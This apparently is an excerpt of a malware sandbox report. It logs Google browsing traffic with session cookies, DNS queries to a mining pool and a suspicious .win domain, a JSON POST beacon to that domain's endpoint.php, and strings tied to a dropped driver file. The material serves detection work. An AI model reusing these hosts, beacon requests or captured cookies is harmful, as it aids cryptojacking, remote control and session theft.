Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=NzU6V,syyx,sygo,zGLm3b,syvy,syvz,syvp,DhPYme,syy3,syxy,syy1,syy0,sywi,sywj,syxz,syxw,syxx,KHourd,MpJwZc,UUJqVe,sy7o,sOXFj,sy7n,s39S4,oGtAuc,NTMZac,nAFL3,sy81,sy80,q0xTif,y05UD,sy12k,sy192,sy18w,syx4,sy18p,syx3,syx2,syx1,sy18v,sy13u,sy18m,sy13y,sy18u,sy12g,sy18q,syh2,sy13z,sy18x,sy126,sy18t,sy18r,sy18s,sy18z,sy18h,sy18n,sy18g,sy18l,sy18i,sy18d,sy14u,sy141,sy142,syx9,syxa,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=sb_wiz,aa,abd,sy17o,syfz,syfr,syfp,syfq,syfs,syg0,syg1,syfw,syfv,syfu,syep,syft,syfj,syfi,syfk,syfh,syfm,sy16j,sygb,sy17m,syyl,syga,syg9,syg8,async,ifl,pHXghd,sf,syig,sy3kp,sonic,sy3kv,syhl,syh1,sy3k7,sy3ka,sy274,sye3,sy9u,sy9f,sy9e,sy9c,spch,syti,syth,rtH1bd,sy19k,sy15l,sy151,sy12b,sydb,sy19i,SMquOb,sy7k,sy7j,syf3,syfe,syfc,syfb,syf2,syf0,syey,sy86,sy83,sy85,syex,syf1,syew,sybg,syb9,sybc,syaj,syap,syai,syah,syag,sya4,syba,syax,syay,syb4,syan,syb3,syaw,syat,syae,syal,syaz,sya6,sya8,sya9,sya5,syao,syad,syaa,sybj,sya0,sy9x,sybi,sy9p,sy9h,sy9k,sy9w,sya3,syb0,syev,syeu,syer,syeq,sy89,uxMpU,syem,sybq,sybo,sybk,syar,sybm,sybh,sy8n,sy8m,sy8l,sy8k,Mlhmy,QGR0gd,aurFic,sy8w,fKUV3e,OTA3Ae,sy7l,OmgaI,EEDORb,PoEs9b,Pjplud,sy8h,A1yn5d,YIZmRd,uY49fb,sy7b,sy79,sy75,sy78,sy77,sy76,byfTOb,lsjVmc,LEikZe,kWgXee,ovKuLd,sgY6Zb,sy8v,sy8y,sy88,xUdipf,NwH0H,gychg,ZfAoz,yDVVkb,qafBPd,ebZ3mb,dowIGb,sy19n,sy19l,syxi,sytn,d5EhJe,sy1a5,fCxEDd,syut,sy1a4,sy1a3,sy1a2,sy19u,sy19r,sy19s,sy17b,sy175,syx6,syx5,T1HOxc,sy19t,sy19q,zx30Y,sy1a7,sy1a6,sy19y,sy15y,Wo3n8,sysz,loL8vb,syt3,syt2,syt1,ms4mZb,sys1,B2qlPe,syue?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=0/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=sylx,sypx?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=syt5,syt4,VsqSCc,sy1b7,P10Owf,sy19z,sy19x,sysj,gSZvdb,syyf,syye,WlNQGd,sysn,sysl,sysk,sysi,DPreE,syys,syyq,nabPbb,syy9,syy7,sylx,sypx,CnSW2d,kQvlef,syyr,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBc..i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA%2Fbr%3D1%2Frs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fck%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog,_fmt:prog,_id:_QVhbZ6XKF6u3i-gP-ZzZoAs_9 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&zx=1734039639112&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=lOO0Vd,sy8i,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
Source: global traffic	HTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w

Source: chromecache_151.12.dr	String found in binary or memory: var Wdc;_.Ydc=function(a){return Wdc("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.Xdc(a),hashtag:"#GoogleDoodle"})};_.Zdc=function(a){return Wdc("https://twitter.com/intent/tweet",{text:a})};_.$dc=function(a,b){return Wdc("mailto:",{subject:a,body:b})};_.Xdc=function(a){var b=a;b&&b.indexOf("//")===0&&(b="https:"+a);return b};Wdc=function(a,b){var c=new _.qn,d;for(d in b)c.add(d,b[d]);a=new _.mh(a);_.mn(a,c);return a.toString()}; equals www.facebook.com (Facebook)
Source: chromecache_151.12.dr	String found in binary or memory: var Wdc;_.Ydc=function(a){return Wdc("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.Xdc(a),hashtag:"#GoogleDoodle"})};_.Zdc=function(a){return Wdc("https://twitter.com/intent/tweet",{text:a})};_.$dc=function(a,b){return Wdc("mailto:",{subject:a,body:b})};_.Xdc=function(a){var b=a;b&&b.indexOf("//")===0&&(b="https:"+a);return b};Wdc=function(a,b){var c=new _.qn,d;for(d in b)c.add(d,b[d]);a=new _.mh(a);_.mn(a,c);return a.toString()}; equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: woo097878781.win
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST /66/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 381Content-Type: application/jsonHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6

Source: cvtres.exe, 00000007.00000003.2148391342.00000171D4680000.00000004.00000001.00020000.00000000.sdmp, cvtres.exe, 00000012.00000003.3332406842.000001FA08B00000.00000004.00000001.00020000.00000000.sdmp, orupcopicsyv.sys.7.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: cvtres.exe, 00000007.00000003.2148391342.00000171D4680000.00000004.00000001.00020000.00000000.sdmp, cvtres.exe, 00000012.00000003.3332406842.000001FA08B00000.00000004.00000001.00020000.00000000.sdmp, orupcopicsyv.sys.7.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: cvtres.exe, 00000007.00000003.2148391342.00000171D4680000.00000004.00000001.00020000.00000000.sdmp, cvtres.exe, 00000012.00000003.3332406842.000001FA08B00000.00000004.00000001.00020000.00000000.sdmp, orupcopicsyv.sys.7.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
